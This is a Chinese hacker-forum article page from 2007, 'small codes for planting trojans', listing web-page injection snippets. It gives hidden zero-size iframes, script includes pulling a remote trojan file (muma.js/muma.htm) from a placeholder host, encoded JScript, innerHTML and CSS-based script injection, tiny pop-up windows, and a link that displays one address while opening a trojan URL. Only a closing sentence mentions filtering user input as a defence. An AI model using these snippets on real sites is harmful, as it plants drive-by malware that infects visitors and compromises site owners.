挂马的一些小代码 -红旋风联盟-技术文档中心|RHU-Tech-Article-Center

相关联接

RHU本级分类

新手入门
 入侵实例
 工具使用
 安全防范
 黑客人物
 软件破解
 漏洞研究

RHU相关搜索

　

RHU广而告之

　

>您的位置：首页 -> 黑客帝国-> 新手入门

挂马的一些小代码

作者:RHU-TAC编辑员来自:RHU网络采集时间:2007-12-4 双击滚屏收藏本页 字体:大中小

点击查看RHU2004全年文章

一:框架挂马

二:js文件挂马

   首先将以下代码
   document.write("<iframe width='0' height='0' src='地址'></iframe>");
   保存为xxx.js，
   则JS挂马代码为
   <script language=javascript src=xxx.js></script>

三:js变形加密

   <SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
   muma.txt可改成任意后缀

四:body挂马

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML + '<iframe src="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

body {
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

九:伪装调用：

十:高级欺骗

<a href="http://www.163.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的

内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open

(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width

=800,height=600,left=10,top=10");
}
</SCRIPT>

实际上,挂木马的基本方法就是利用脚本程序发帖和提交信息的过滤不严格,使得我们可以将一些HTML或者脚本代码段作为文本提交,但是能被脚本解析.

从这个思想出发,可以利用正则表达的方法构造出更加巧妙的挂马方法.防止这种攻击的方法就是对所有的用户提交的数据在发布前必须经过类型检验.

OVER

第[1] 页

RedHyphone.Union 投稿邮箱

[特别声明]:
①本站文章大多搜索转载自网络中，如果侵犯了您的权利，请告之我们。本站将立即删除。
②本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有。

【查看评论】【向上滚屏】【关闭窗口】【大中小】【打印】

-相关文章

Linux系统中密码破解大全

暴力注入Explorer详细解析

Apple QuickTime RTSP响应头远程栈溢出漏洞

VMware Tools HGFS.Sys 驱动权限提升漏洞

深入理解防火墙　屏蔽外界攻击

-文章评论 (关闭)

·还没有相关的评论！

网上大名：

红旋风网络技术联盟　RHUTech.Union